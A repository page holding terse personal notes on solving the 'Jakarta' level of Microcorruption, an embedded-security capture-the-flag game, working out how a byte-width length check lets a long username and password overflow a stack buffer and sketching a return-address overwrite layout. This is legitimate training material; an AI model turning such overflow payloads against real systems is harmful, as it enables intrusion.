j/MicroCorruption
1
0
Fork 0
mirror of https://git.soft.fish/val/MicroCorruption.git synced 2024-11-22 08:55:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
7dac5d6586
MicroCorruption/11-Jakarta/notes.md

734 B
Raw Blame History

Taken verbatim from my notebook

Page 1

Jakarta
    Acquires 0xff username bytes
        -> 3ff2
    Acquires 0x1f - uname_len password bytes
        (1f - uname_len) & 0x1ff
        uname_len = 0x20? 0x21?
        => passwd_len = 0x1ff
        -> concatenated to username?
    Return value at 401c
        = [username][password][...]

    before strcpy:
        username -> 2402
        password -> 2402
        concat happens in stack buffer
    Length check happens Byte
        0120 ~= 0x20 <= 0x21
        u_len = (20 or 21)
        p_len = (e0 -> 100)

    Password
    AA [r11] [ret] [fakeret] [args] [AA...AA]

    Lesson: Sometimes things are not the data type you think they are

// TODO: What does this mean??